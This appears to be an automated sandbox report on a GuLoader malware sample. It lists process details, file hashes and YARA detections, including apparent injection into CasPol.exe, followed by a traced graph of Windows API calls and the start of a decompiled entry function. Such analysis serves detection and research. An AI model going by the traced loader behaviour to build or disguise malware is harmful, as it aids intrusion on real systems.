                                                    Start time:13:15:59
                                                    Start date:20/03/2023
                                                    Path:C:\Users\user\Desktop\download.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\download.exe
                                                    Imagebase:0x400000
                                                    File size:680560 bytes
                                                    MD5 hash:064FA36DA0C2CA360B0906CC5BFE67C6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Target ID:4
                                                    Start time:13:16:37
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\download.exe
                                                    Imagebase:0x10000
                                                    File size:106496 bytes
                                                    MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate

                                                    Target ID:5
                                                    Start time:13:16:37
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7d7f70000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                      Execution Graph

                                                      Execution Coverage:7.3%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:26.6%
                                                      Total number of Nodes:1005
                                                      Total number of Limit Nodes:43
SetWindowPos 12828->12830 12831 403b8a 12828->12831 12832 40401c 18 API calls 12829->12832 12830->12831 12836 403ba7 12831->12836 12837 403b8f ShowWindow 12831->12837 12838 403cd6 SetClassLongA 12832->12838 12833 403d46 12840 403c96 12833->12840 12896 404068 12833->12896 12834->12833 12839 401389 2 API calls 12834->12839 12841 403bc9 12836->12841 12842 403baf DestroyWindow 12836->12842 12837->12836 12843 40140b 2 API calls 12838->12843 12844 403d1e 12839->12844 12846 403bce SetWindowLongA 12841->12846 12847 403bdf 12841->12847 12845 403fa5 12842->12845 12843->12834 12844->12833 12850 403d22 SendMessageA 12844->12850 12845->12840 12856 403fd6 ShowWindow 12845->12856 12846->12840 12848 403c88 12847->12848 12849 403beb GetDlgItem 12847->12849 12855 404083 8 API calls 12848->12855 12853 403c1b 12849->12853 12854 403bfe SendMessageA IsWindowEnabled 12849->12854 12850->12840 12851 40140b 2 API calls 12863 403d58 12851->12863 12852 403fa7 DestroyWindow EndDialog 12852->12845 12858 403c28 12853->12858 12859 403c6f SendMessageA 12853->12859 12860 403c3b 12853->12860 12870 403c20 12853->12870 12854->12840 12854->12853 12855->12840 12856->12840 12857 405f9f 17 API calls 12857->12863 12858->12859 12858->12870 12859->12848 12864 403c43 12860->12864 12865 403c58 12860->12865 12862 40401c 18 API calls 12862->12863 12863->12840 12863->12851 12863->12852 12863->12857 12863->12862 12871 40401c 18 API calls 12863->12871 12887 403ee7 DestroyWindow 12863->12887 12909 40140b 12864->12909 12867 40140b 2 API calls 12865->12867 12866 403c56 12866->12848 12869 403c5f 12867->12869 12869->12848 12869->12870 12912 403ff5 12870->12912 12872 403dd3 GetDlgItem 12871->12872 12873 403df0 ShowWindow KiUserCallbackDispatcher 12872->12873 12874 403de8 12872->12874 12899 40403e KiUserCallbackDispatcher 12873->12899 12874->12873 12876 403e1a EnableWindow 12881 403e2e 12876->12881 12877 403e33 GetSystemMenu EnableMenuItem SendMessageA 12878 403e63 SendMessageA 12877->12878 12877->12881 12878->12881 
12881->12877 12900 404051 SendMessageA 12881->12900 12901 403b29 12881->12901 12904 405f7d lstrcpynA 12881->12904 12883 403e92 lstrlenA 12884 405f9f 17 API calls 12883->12884 12885 403ea3 SetWindowTextA 12884->12885 12905 401389 12885->12905 12887->12845 12888 403f01 CreateDialogParamA 12887->12888 12888->12845 12889 403f34 12888->12889 12890 40401c 18 API calls 12889->12890 12891 403f3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 12890->12891 12892 401389 2 API calls 12891->12892 12893 403f85 12892->12893 12893->12840 12894 403f8d ShowWindow 12893->12894 12895 404068 SendMessageA 12894->12895 12895->12845 12897 404080 12896->12897 12898 404071 SendMessageA 12896->12898 12897->12863 12898->12897 12899->12876 12900->12881 12902 405f9f 17 API calls 12901->12902 12903 403b37 SetWindowTextA 12902->12903 12903->12881 12904->12883 12907 401390 12905->12907 12906 4013fe 12906->12863 12907->12906 12908 4013cb MulDiv SendMessageA 12907->12908 12908->12907 12910 401389 2 API calls 12909->12910 12911 401420 12910->12911 12911->12870 12913 404002 SendMessageA 12912->12913 12914 403ffc 12912->12914 12913->12866 12914->12913 12915 402688 12916 402904 12915->12916 12917 40268f 12915->12917 12923 402aa9 12917->12923 12919 402696 12920 4026a5 SetFilePointer 12919->12920 12920->12916 12921 4026b5 12920->12921 12926 405edb wsprintfA 12921->12926 12924 405f9f 17 API calls 12923->12924 12925 402abe 12924->12925 12925->12919 12926->12916 12927 401c0a 12928 402aa9 17 API calls 12927->12928 12929 401c11 12928->12929 12930 402aa9 17 API calls 12929->12930 12931 401c1e 12930->12931 12932 401c33 12931->12932 12933 402acb 17 API calls 12931->12933 12934 401c43 12932->12934 12935 402acb 17 API calls 12932->12935 12933->12932 12936 401c9a 12934->12936 12937 401c4e 12934->12937 12935->12934 12938 402acb 17 API calls 12936->12938 12939 402aa9 17 API calls 12937->12939 12940 401c9f 12938->12940 12941 401c53 12939->12941 12942 402acb 17 API calls 12940->12942 12943 402aa9 17 API calls 
12941->12943 12944 401ca8 FindWindowExA 12942->12944 12945 401c5f 12943->12945 12948 401cc6 12944->12948 12946 401c8a SendMessageA 12945->12946 12947 401c6c SendMessageTimeoutA 12945->12947 12946->12948 12947->12948 12949 4025ca 12950 402aa9 17 API calls 12949->12950 12953 4025d4 12950->12953 12951 402642 12953->12951 12954 402644 12953->12954 12956 402654 12953->12956 12958 405b8e ReadFile 12953->12958 12960 405edb wsprintfA 12954->12960 12956->12951 12957 40266a SetFilePointer 12956->12957 12957->12951 12959 405bac 12958->12959 12959->12953 12960->12951 12961 4014ca 12962 4050a4 24 API calls 12961->12962 12963 4014d1 12962->12963 12964 706b28e1 12965 706b2931 12964->12965 12966 706b28f1 VirtualProtect 12964->12966 12966->12965 12967 4020d1 12968 402acb 17 API calls 12967->12968 12969 4020d8 12968->12969 12970 402acb 17 API calls 12969->12970 12971 4020e2 12970->12971 12972 402acb 17 API calls 12971->12972 12973 4020ec 12972->12973 12974 402acb 17 API calls 12973->12974 12975 4020f6 12974->12975 12976 402acb 17 API calls 12975->12976 12978 402100 12976->12978 12977 402142 CoCreateInstance 12982 402161 12977->12982 12984 40220c 12977->12984 12978->12977 12979 402acb 17 API calls 12978->12979 12979->12977 12980 401423 24 API calls 12981 402242 12980->12981 12983 4021ec MultiByteToWideChar 12982->12983 12982->12984 12983->12984 12984->12980 12984->12981 12985 4023d6 12986 402acb 17 API calls 12985->12986 12987 4023e8 12986->12987 12988 402acb 17 API calls 12987->12988 12989 4023f2 12988->12989 13002 402b5b 12989->13002 12992 402957 12993 402427 12995 402433 12993->12995 12997 402aa9 17 API calls 12993->12997 12994 402acb 17 API calls 12996 402420 lstrlenA 12994->12996 12998 402452 RegSetValueExA 12995->12998 13006 402f9c 12995->13006 12996->12993 12997->12995 13000 402468 RegCloseKey 12998->13000 13000->12992 13003 402b76 13002->13003 13026 405e31 13003->13026 13008 402fb2 13006->13008 13007 402fe0 13030 40318b 13007->13030 13008->13007 13035 4031a1 SetFilePointer 
13008->13035 13012 403124 13014 403166 13012->13014 13019 403128 13012->13019 13013 402ffd GetTickCount 13015 40310e 13013->13015 13022 403029 13013->13022 13016 40318b ReadFile 13014->13016 13015->12998 13016->13015 13017 40318b ReadFile 13017->13022 13018 40318b ReadFile 13018->13019 13019->13015 13019->13018 13020 405bbd WriteFile 13019->13020 13020->13019 13021 40307f GetTickCount 13021->13022 13022->13015 13022->13017 13022->13021 13023 4030a4 MulDiv wsprintfA 13022->13023 13033 405bbd WriteFile 13022->13033 13024 4050a4 24 API calls 13023->13024 13024->13022 13027 405e40 13026->13027 13028 402402 13027->13028 13029 405e4b RegCreateKeyExA 13027->13029 13028->12992 13028->12993 13028->12994 13029->13028 13031 405b8e ReadFile 13030->13031 13032 402feb 13031->13032 13032->13012 13032->13013 13032->13015 13034 405bdb 13033->13034 13034->13022 13035->13007 13036 4014d6 13037 402aa9 17 API calls 13036->13037 13038 4014dc Sleep 13037->13038 13040 402957 13038->13040 13041 401759 13042 402acb 17 API calls 13041->13042 13043 401760 13042->13043 13044 401786 13043->13044 13045 40177e 13043->13045 13084 405f7d lstrcpynA 13044->13084 13083 405f7d lstrcpynA 13045->13083 13048 401784 13052 4061e7 5 API calls 13048->13052 13049 401791 13085 405915 lstrlenA CharPrevA 13049->13085 13062 4017a3 13052->13062 13056 4017ba CompareFileTime 13056->13062 13057 40187e 13058 4050a4 24 API calls 13057->13058 13061 401888 13058->13061 13059 4050a4 24 API calls 13067 40186a 13059->13067 13060 405f7d lstrcpynA 13060->13062 13063 402f9c 31 API calls 13061->13063 13062->13056 13062->13057 13062->13060 13068 405f9f 17 API calls 13062->13068 13077 401855 13062->13077 13079 405af1 GetFileAttributesA 13062->13079 13082 405b16 GetFileAttributesA CreateFileA 13062->13082 13088 406280 FindFirstFileA 13062->13088 13091 405699 13062->13091 13064 40189b 13063->13064 13065 4018af SetFileTime 13064->13065 13066 4018c1 CloseHandle 13064->13066 13065->13066 13066->13067 13069 4018d2 13066->13069 
13068->13062 13070 4018d7 13069->13070 13071 4018ea 13069->13071 13072 405f9f 17 API calls 13070->13072 13073 405f9f 17 API calls 13071->13073 13075 4018df lstrcatA 13072->13075 13076 4018f2 13073->13076 13075->13076 13076->13067 13078 405699 MessageBoxIndirectA 13076->13078 13077->13059 13077->13067 13078->13067 13080 405b10 13079->13080 13081 405b03 SetFileAttributesA 13079->13081 13080->13062 13081->13080 13082->13062 13083->13048 13084->13049 13086 401797 lstrcatA 13085->13086 13087 40592f lstrcatA 13085->13087 13086->13048 13087->13086 13089 4062a1 13088->13089 13090 406296 FindClose 13088->13090 13089->13062 13090->13089 13092 4056ae 13091->13092 13093 4056c2 MessageBoxIndirectA 13092->13093 13094 4056fa 13092->13094 13093->13094 13094->13062 13095 401d9b GetDC 13096 402aa9 17 API calls 13095->13096 13097 401dad GetDeviceCaps MulDiv ReleaseDC 13096->13097 13098 402aa9 17 API calls 13097->13098 13099 401dde 13098->13099 13100 405f9f 17 API calls 13099->13100 13101 401e1b CreateFontIndirectA 13100->13101 13102 40257d 13101->13102 13103 40159d 13104 402acb 17 API calls 13103->13104 13105 4015a4 SetFileAttributesA 13104->13105 13106 4015b6 13105->13106 13107 40171f 13108 402acb 17 API calls 13107->13108 13109 401726 SearchPathA 13108->13109 13110 401741 13109->13110 13111 4051e2 13112 405204 GetDlgItem GetDlgItem GetDlgItem 13111->13112 13113 40538d 13111->13113 13157 404051 SendMessageA 13112->13157 13115 405395 GetDlgItem CreateThread CloseHandle 13113->13115 13116 4053bd 13113->13116 13115->13116 13160 405176 OleInitialize 13115->13160 13117 4053eb 13116->13117 13119 4053d3 ShowWindow ShowWindow 13116->13119 13120 40540c 13116->13120 13121 4053f3 13117->13121 13122 405446 13117->13122 13118 405274 13127 40527b GetClientRect GetSystemMetrics SendMessageA SendMessageA 13118->13127 13159 404051 SendMessageA 13119->13159 13126 404083 8 API calls 13120->13126 13124 4053fb 13121->13124 13125 40541f ShowWindow 13121->13125 13122->13120 13130 405453 SendMessageA 
13122->13130 13131 403ff5 SendMessageA 13124->13131 13133 405431 13125->13133 13134 40543f 13125->13134 13132 405418 13126->13132 13128 4052e9 13127->13128 13129 4052cd SendMessageA SendMessageA 13127->13129 13135 4052fc 13128->13135 13136 4052ee SendMessageA 13128->13136 13129->13128 13130->13132 13137 40546c CreatePopupMenu 13130->13137 13131->13120 13138 4050a4 24 API calls 13133->13138 13139 403ff5 SendMessageA 13134->13139 13141 40401c 18 API calls 13135->13141 13136->13135 13140 405f9f 17 API calls 13137->13140 13138->13134 13139->13122 13142 40547c AppendMenuA 13140->13142 13143 40530c 13141->13143 13144 40549a GetWindowRect 13142->13144 13145 4054ad TrackPopupMenu 13142->13145 13146 405315 ShowWindow 13143->13146 13147 405349 GetDlgItem SendMessageA 13143->13147 13144->13145 13145->13132 13148 4054c9 13145->13148 13149 405338 13146->13149 13150 40532b ShowWindow 13146->13150 13147->13132 13151 405370 SendMessageA SendMessageA 13147->13151 13152 4054e8 SendMessageA 13148->13152 13158 404051 SendMessageA 13149->13158 13150->13149 13151->13132 13152->13152 13153 405505 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 13152->13153 13155 405527 SendMessageA 13153->13155 13155->13155 13156 405549 GlobalUnlock SetClipboardData CloseClipboard 13155->13156 13156->13132 13157->13118 13158->13147 13159->13117 13161 404068 SendMessageA 13160->13161 13165 405199 13161->13165 13162 4051c0 13163 404068 SendMessageA 13162->13163 13164 4051d2 OleUninitialize 13163->13164 13165->13162 13166 401389 2 API calls 13165->13166 13166->13165 13167 4024e5 13168 402b0b 17 API calls 13167->13168 13169 4024ef 13168->13169 13170 402aa9 17 API calls 13169->13170 13171 4024f8 13170->13171 13172 402513 RegEnumKeyA 13171->13172 13173 40251f RegEnumValueA 13171->13173 13175 40271c 13171->13175 13174 402534 RegCloseKey 13172->13174 13173->13174 13174->13175 13177 4031e9 SetErrorMode GetVersion 13178 40322a 13177->13178 13179 403230 13177->13179 13180 406315 5 API calls 13178->13180 13181 
4062a7 3 API calls 13179->13181 13180->13179 13182 403246 lstrlenA 13181->13182 13182->13179 13183 403255 13182->13183 13184 406315 5 API calls 13183->13184 13185 40325c 13184->13185 13186 406315 5 API calls 13185->13186 13187 403263 13186->13187 13188 406315 5 API calls 13187->13188 13189 40326f #17 OleInitialize SHGetFileInfoA 13188->13189 13267 405f7d lstrcpynA 13189->13267 13192 4032bb GetCommandLineA 13268 405f7d lstrcpynA 13192->13268 13194 4032cd 13195 405940 CharNextA 13194->13195 13196 4032f6 CharNextA 13195->13196 13204 403306 13196->13204 13197 4033d0 13198 4033e3 GetTempPathA 13197->13198 13269 4031b8 13198->13269 13200 4033fb 13201 403455 DeleteFileA 13200->13201 13202 4033ff GetWindowsDirectoryA lstrcatA 13200->13202 13279 402d63 GetTickCount GetModuleFileNameA 13201->13279 13205 4031b8 12 API calls 13202->13205 13203 405940 CharNextA 13203->13204 13204->13197 13204->13203 13208 4033d2 13204->13208 13207 40341b 13205->13207 13207->13201 13210 40341f GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 13207->13210 13374 405f7d lstrcpynA 13208->13374 13209 403469 13214 4034ef 13209->13214 13218 405940 CharNextA 13209->13218 13262 4034ff 13209->13262 13213 4031b8 12 API calls 13210->13213 13216 40344d 13213->13216 13307 4037ab 13214->13307 13216->13201 13216->13262 13221 403484 13218->13221 13219 403637 13223 4036b9 ExitProcess 13219->13223 13224 40363f GetCurrentProcess OpenProcessToken 13219->13224 13220 403519 13222 405699 MessageBoxIndirectA 13220->13222 13226 4034ca 13221->13226 13227 40352f 13221->13227 13228 403527 ExitProcess 13222->13228 13229 40368a 13224->13229 13230 40365a LookupPrivilegeValueA AdjustTokenPrivileges 13224->13230 13375 405a03 13226->13375 13363 405604 13227->13363 13233 406315 5 API calls 13229->13233 13230->13229 13236 403691 13233->13236 13239 4036a6 ExitWindowsEx 13236->13239 13240 4036b2 13236->13240 13237 403550 lstrcatA lstrcmpiA 13242 40356c 13237->13242 13237->13262 13238 403545 lstrcatA 13238->13237 
13239->13223 13239->13240 13243 40140b 2 API calls 13240->13243 13245 403571 13242->13245 13246 403578 13242->13246 13243->13223 13244 4034e4 13390 405f7d lstrcpynA 13244->13390 13398 40556a CreateDirectoryA 13245->13398 13403 4055e7 CreateDirectoryA 13246->13403 13250 40357d SetCurrentDirectoryA 13252 403597 13250->13252 13253 40358c 13250->13253 13366 405f7d lstrcpynA 13252->13366 13406 405f7d lstrcpynA 13253->13406 13256 405f9f 17 API calls 13257 4035d6 DeleteFileA 13256->13257 13258 4035e3 CopyFileA 13257->13258 13264 4035a5 13257->13264 13258->13264 13259 40362b 13260 405d5c 36 API calls 13259->13260 13260->13262 13391 4036d1 13262->13391 13263 405f9f 17 API calls 13263->13264 13264->13256 13264->13259 13264->13263 13266 403617 CloseHandle 13264->13266 13367 405d5c MoveFileExA 13264->13367 13371 40561c CreateProcessA 13264->13371 13266->13264 13267->13192 13268->13194 13270 4061e7 5 API calls 13269->13270 13271 4031c4 13270->13271 13272 4031ce 13271->13272 13273 405915 3 API calls 13271->13273 13272->13200 13274 4031d6 13273->13274 13275 4055e7 2 API calls 13274->13275 13276 4031dc 13275->13276 13277 405b45 2 API calls 13276->13277 13278 4031e7 13277->13278 13278->13200 13407 405b16 GetFileAttributesA CreateFileA 13279->13407 13281 402da3 13306 402db3 13281->13306 13408 405f7d lstrcpynA 13281->13408 13283 402dc9 13409 40595c lstrlenA 13283->13409 13287 402dda GetFileSize 13302 402ed6 13287->13302 13305 402df1 13287->13305 13289 402edf 13291 402f0f GlobalAlloc 13289->13291 13289->13306 13426 4031a1 SetFilePointer 13289->13426 13290 40318b ReadFile 13290->13305 13425 4031a1 SetFilePointer 13291->13425 13293 402f42 13295 402cff 6 API calls 13293->13295 13295->13306 13296 402ef8 13298 40318b ReadFile 13296->13298 13297 402f2a 13299 402f9c 31 API calls 13297->13299 13300 402f03 13298->13300 13303 402f36 13299->13303 13300->13291 13300->13306 13301 402cff 6 API calls 13301->13305 13414 402cff 13302->13414 13303->13303 13304 402f73 SetFilePointer 13303->13304 
13303->13306 13304->13306 13305->13290 13305->13293 13305->13301 13305->13302 13305->13306 13306->13209 13308 406315 5 API calls 13307->13308 13309 4037bf 13308->13309 13310 4037c5 GetUserDefaultUILanguage 13309->13310 13311 4037d7 13309->13311 13431 405edb wsprintfA 13310->13431 13313 405e64 3 API calls 13311->13313 13315 403802 13313->13315 13314 4037d5 13432 403a70 13314->13432 13316 403820 lstrcatA 13315->13316 13317 405e64 3 API calls 13315->13317 13316->13314 13317->13316 13320 405a03 18 API calls 13321 403852 13320->13321 13322 4038db 13321->13322 13324 405e64 3 API calls 13321->13324 13323 405a03 18 API calls 13322->13323 13325 4038e1 13323->13325 13327 40387e 13324->13327 13326 4038f1 LoadImageA 13325->13326 13328 405f9f 17 API calls 13325->13328 13329 403997 13326->13329 13330 403918 RegisterClassA 13326->13330 13327->13322 13331 40389a lstrlenA 13327->13331 13334 405940 CharNextA 13327->13334 13328->13326 13333 40140b 2 API calls 13329->13333 13332 40394e SystemParametersInfoA CreateWindowExA 13330->13332 13362 4039a1 13330->13362 13335 4038a8 lstrcmpiA 13331->13335 13336 4038ce 13331->13336 13332->13329 13337 40399d 13333->13337 13339 403898 13334->13339 13335->13336 13340 4038b8 GetFileAttributesA 13335->13340 13338 405915 3 API calls 13336->13338 13341 403a70 18 API calls 13337->13341 13337->13362 13342 4038d4 13338->13342 13339->13331 13343 4038c4 13340->13343 13344 4039ae 13341->13344 13440 405f7d lstrcpynA 13342->13440 13343->13336 13346 40595c 2 API calls 13343->13346 13347 4039ba ShowWindow 13344->13347 13348 403a3d 13344->13348 13346->13336 13350 4062a7 3 API calls 13347->13350 13349 405176 5 API calls 13348->13349 13351 403a43 13349->13351 13352 4039d2 13350->13352 13353 403a47 13351->13353 13354 403a5f 13351->13354 13355 4039e0 GetClassInfoA 13352->13355 13357 4062a7 3 API calls 13352->13357 13360 40140b 2 API calls 13353->13360 13353->13362 13356 40140b 2 API calls 13354->13356 13358 4039f4 GetClassInfoA RegisterClassA 13355->13358 13359 
403a0a DialogBoxParamA 13355->13359 13356->13362 13357->13355 13358->13359 13361 40140b 2 API calls 13359->13361 13360->13362 13361->13362 13362->13262 13364 406315 5 API calls 13363->13364 13365 403534 lstrcatA 13364->13365 13365->13237 13365->13238 13366->13264 13368 405d70 13367->13368 13369 405d7d 13367->13369 13442 405bec 13368->13442 13369->13264 13372 40565b 13371->13372 13373 40564f CloseHandle 13371->13373 13372->13264 13373->13372 13374->13198 13476 405f7d lstrcpynA 13375->13476 13377 405a14 13477 4059ae CharNextA CharNextA 13377->13477 13380 4034d5 13380->13262 13389 405f7d lstrcpynA 13380->13389 13381 4061e7 5 API calls 13387 405a2a 13381->13387 13382 405a55 lstrlenA 13383 405a60 13382->13383 13382->13387 13385 405915 3 API calls 13383->13385 13384 406280 2 API calls 13384->13387 13386 405a65 GetFileAttributesA 13385->13386 13386->13380 13387->13380 13387->13382 13387->13384 13388 40595c 2 API calls 13387->13388 13388->13382 13389->13244 13390->13214 13392 4036e9 13391->13392 13393 4036db CloseHandle 13391->13393 13483 403716 13392->13483 13393->13392 13399 403576 13398->13399 13400 4055bb GetLastError 13398->13400 13399->13250 13400->13399 13401 4055ca SetFileSecurityA 13400->13401 13401->13399 13402 4055e0 GetLastError 13401->13402 13402->13399 13404 4055f7 13403->13404 13405 4055fb GetLastError 13403->13405 13404->13250 13405->13404 13406->13252 13407->13281 13408->13283 13410 405969 13409->13410 13411 402dcf 13410->13411 13412 40596e CharPrevA 13410->13412 13413 405f7d lstrcpynA 13411->13413 13412->13410 13412->13411 13413->13287 13415 402d20 13414->13415 13416 402d08 13414->13416 13419 402d30 GetTickCount 13415->13419 13420 402d28 13415->13420 13417 402d11 DestroyWindow 13416->13417 13418 402d18 13416->13418 13417->13418 13418->13289 13422 402d61 13419->13422 13423 402d3e CreateDialogParamA ShowWindow 13419->13423 13427 406351 13420->13427 13422->13289 13423->13422 13425->13297 13426->13296 13428 40636e PeekMessageA 13427->13428 13429 406364 
DispatchMessageA 13428->13429 13430 402d2e 13428->13430 13429->13428 13430->13289 13431->13314 13433 403a84 13432->13433 13441 405edb wsprintfA 13433->13441 13435 403af5 13436 403b29 18 API calls 13435->13436 13438 403afa 13436->13438 13437 403830 13437->13320 13438->13437 13439 405f9f 17 API calls 13438->13439 13439->13438 13440->13322 13441->13435 13443 405c12 13442->13443 13444 405c38 GetShortPathNameA 13442->13444 13469 405b16 GetFileAttributesA CreateFileA 13443->13469 13446 405d57 13444->13446 13447 405c4d 13444->13447 13446->13369 13447->13446 13449 405c55 wsprintfA 13447->13449 13448 405c1c CloseHandle GetShortPathNameA 13448->13446 13450 405c30 13448->13450 13451 405f9f 17 API calls 13449->13451 13450->13444 13450->13446 13452 405c7d 13451->13452 13470 405b16 GetFileAttributesA CreateFileA 13452->13470 13454 405c8a 13454->13446 13455 405c99 GetFileSize GlobalAlloc 13454->13455 13456 405d50 CloseHandle 13455->13456 13457 405cbb 13455->13457 13456->13446 13458 405b8e ReadFile 13457->13458 13459 405cc3 13458->13459 13459->13456 13471 405a7b lstrlenA 13459->13471 13462 405cda lstrcpyA 13465 405cfc 13462->13465 13463 405cee 13464 405a7b 4 API calls 13463->13464 13464->13465 13466 405d33 SetFilePointer 13465->13466 13467 405bbd WriteFile 13466->13467 13468 405d49 GlobalFree 13467->13468 13468->13456 13469->13448 13470->13454 13472 405abc lstrlenA 13471->13472 13473 405ac4 13472->13473 13474 405a95 lstrcmpiA 13472->13474 13473->13462 13473->13463 13474->13473 13475 405ab3 CharNextA 13474->13475 13475->13472 13476->13377 13478 4059d9 13477->13478 13479 4059c9 13477->13479 13481 405940 CharNextA 13478->13481 13482 4059f9 13478->13482 13479->13478 13480 4059d4 CharNextA 13479->13480 13480->13482 13481->13478 13482->13380 13482->13381 13484 403724 13483->13484 13485 4036ee 13484->13485 13486 403729 FreeLibrary GlobalFree 13484->13486 13487 405745 13485->13487 13486->13485 13486->13486 13488 405a03 18 API calls 13487->13488 13489 405765 13488->13489 13490 405784 
13489->13490 13491 40576d DeleteFileA 13489->13491 13497 4058b2 13490->13497 13527 405f7d lstrcpynA 13490->13527 13492 403508 OleUninitialize 13491->13492 13492->13219 13492->13220 13494 4057aa 13495 4057b0 lstrcatA 13494->13495 13496 4057bd 13494->13496 13498 4057c3 13495->13498 13499 40595c 2 API calls 13496->13499 13497->13492 13500 406280 2 API calls 13497->13500 13502 4057d1 lstrcatA 13498->13502 13504 4057dc lstrlenA FindFirstFileA 13498->13504 13499->13498 13501 4058d6 13500->13501 13501->13492 13503 4058da 13501->13503 13502->13504 13505 405915 3 API calls 13503->13505 13504->13497 13515 405800 13504->13515 13506 4058e0 13505->13506 13508 4056fd 5 API calls 13506->13508 13507 405940 CharNextA 13507->13515 13509 4058ec 13508->13509 13510 4058f0 13509->13510 13511 405906 13509->13511 13510->13492 13517 4050a4 24 API calls 13510->13517 13514 4050a4 24 API calls 13511->13514 13512 405891 FindNextFileA 13512->13515 13516 4058a9 FindClose 13512->13516 13514->13492 13515->13507 13515->13512 13524 405852 13515->13524 13528 405f7d lstrcpynA 13515->13528 13516->13497 13518 4058fd 13517->13518 13519 405d5c 36 API calls 13518->13519 13522 405904 13519->13522 13521 405745 60 API calls 13521->13524 13522->13492 13523 4050a4 24 API calls 13523->13512 13524->13512 13524->13521 13524->13523 13525 4050a4 24 API calls 13524->13525 13526 405d5c 36 API calls 13524->13526 13529 4056fd 13524->13529 13525->13524 13526->13524 13527->13494 13528->13515 13530 405af1 2 API calls 13529->13530 13531 405709 13530->13531 13532 40572a 13531->13532 13533 405720 DeleteFileA 13531->13533 13534 405718 RemoveDirectoryA 13531->13534 13532->13524 13535 405726 13533->13535 13534->13535 13535->13532 13536 405736 SetFileAttributesA 13535->13536 13536->13532 13537 40166a 13538 402acb 17 API calls 13537->13538 13539 401671 13538->13539 13540 402acb 17 API calls 13539->13540 13541 40167a 13540->13541 13542 402acb 17 API calls 13541->13542 13543 401683 MoveFileA 13542->13543 13544 401696 13543->13544 
13545 40168f 13543->13545 13547 406280 2 API calls 13544->13547 13549 402242 13544->13549 13546 401423 24 API calls 13545->13546 13546->13549 13548 4016a5 13547->13548 13548->13549 13550 405d5c 36 API calls 13548->13550 13550->13545 13551 401e2b 13552 402aa9 17 API calls 13551->13552 13553 401e31 13552->13553 13554 402aa9 17 API calls 13553->13554 13555 401e3d 13554->13555 13556 401e54 EnableWindow 13555->13556 13557 401e49 ShowWindow 13555->13557 13558 402957 13556->13558 13557->13558 13559 40156f 13560 401586 13559->13560 13561 40157f ShowWindow 13559->13561 13562 402904 13560->13562 13563 401596 ShowWindow 13560->13563 13561->13560 13563->13562 13564 4028ff 13563->13564 13566 405edb wsprintfA 13564->13566 13566->13562 13567 401932 13568 401934 13567->13568 13569 402acb 17 API calls 13568->13569 13570 401939 13569->13570 13571 405745 67 API calls 13570->13571 13572 401942 13571->13572 13573 402473 13574 402b0b 17 API calls 13573->13574 13575 40247d 13574->13575 13576 402acb 17 API calls 13575->13576 13577 402486 13576->13577 13578 402490 RegQueryValueExA 13577->13578 13583 40271c 13577->13583 13579 4024b0 13578->13579 13580 4024b6 RegCloseKey 13578->13580 13579->13580 13584 405edb wsprintfA 13579->13584 13580->13583 13584->13580 13585 4015bb 13586 402acb 17 API calls 13585->13586 13587 4015c2 13586->13587 13588 4059ae 4 API calls 13587->13588 13600 4015ca 13588->13600 13589 401624 13591 401652 13589->13591 13592 401629 13589->13592 13590 405940 CharNextA 13590->13600 13594 401423 24 API calls 13591->13594 13593 401423 24 API calls 13592->13593 13595 401630 13593->13595 13602 40164a 13594->13602 13604 405f7d lstrcpynA 13595->13604 13597 4055e7 2 API calls 13597->13600 13598 405604 5 API calls 13598->13600 13599 40163b SetCurrentDirectoryA 13599->13602 13600->13589 13600->13590 13600->13597 13600->13598 13601 40160c GetFileAttributesA 13600->13601 13603 40556a 4 API calls 13600->13603 13601->13600 13603->13600 13604->13599 13605 4022fc 13606 402304 13605->13606 
13607 40230a 13605->13607 13608 402acb 17 API calls 13606->13608 13609 402acb 17 API calls 13607->13609 13612 40231a 13607->13612 13608->13607 13609->13612 13610 402acb 17 API calls 13613 402328 13610->13613 13611 402acb 17 API calls 13614 402331 WritePrivateProfileStringA 13611->13614 13612->13610 13612->13613 13613->13611 13615 4026fe 13616 402acb 17 API calls 13615->13616 13617 402705 FindFirstFileA 13616->13617 13618 402728 13617->13618 13622 402718 13617->13622 13619 40272f 13618->13619 13623 405edb wsprintfA 13618->13623 13624 405f7d lstrcpynA 13619->13624 13623->13619 13624->13622

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      C-Code - Quality: 86%
                                                      			_entry_() {
                                                      				signed int _t42;
                                                      				intOrPtr* _t47;
                                                      				CHAR* _t51;
                                                      				char* _t53;
                                                      				CHAR* _t55;
                                                      				void* _t59;
                                                      				intOrPtr _t61;
                                                      				int _t63;
                                                      				int _t66;
                                                      				signed int _t67;
                                                      				int _t68;
                                                      				signed int _t70;
                                                      				intOrPtr _t86;
                                                      				intOrPtr _t92;
                                                      				void* _t94;
                                                      				signed int _t110;
                                                      				void* _t113;
                                                      				void* _t118;
                                                      				intOrPtr* _t119;
                                                      				char _t122;
                                                      				signed int _t141;
